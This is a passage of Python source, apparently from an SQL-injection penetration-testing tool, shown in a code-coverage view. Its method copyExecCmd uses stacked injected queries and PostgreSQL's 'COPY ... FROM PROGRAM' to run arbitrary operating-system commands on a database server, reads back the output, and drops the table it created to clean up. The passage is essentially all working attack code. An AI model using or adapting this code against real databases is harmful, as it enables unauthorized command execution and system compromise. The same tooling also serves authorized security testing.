(self, cmd)
| 98 | self.cleanup(onlyFileTbl=True) |
| 99 | |
| 100 | def copyExecCmd(self, cmd): |
| 101 | output = None |
| 102 | |
| 103 | if isStackingAvailable(): |
| 104 | # Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5 |
| 105 | self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName |
| 106 | self._forgedCmd += "CREATE TABLE %s(%s text);" % (self.cmdTblName, self.tblField) |
| 107 | self._forgedCmd += "COPY %s FROM PROGRAM '%s';" % (self.cmdTblName, cmd.replace("'", "''")) |
| 108 | inject.goStacked(self._forgedCmd) |
| 109 | |
| 110 | query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName) |
| 111 | output = inject.getValue(query, resumeValue=False) |
| 112 | |
| 113 | if isListLike(output): |
| 114 | output = flattenValue(output) |
| 115 | output = filterNone(output) |
| 116 | |
| 117 | if not isNoneValue(output): |
| 118 | output = os.linesep.join(output) |
| 119 | |
| 120 | self._cleanupCmd = "DROP TABLE %s" % self.cmdTblName |
| 121 | inject.goStacked(self._cleanupCmd) |
| 122 | |
| 123 | return output |
| 124 | |
| 125 | def checkCopyExec(self): |
| 126 | if kb.copyExecTest is None: |
no test coverage detected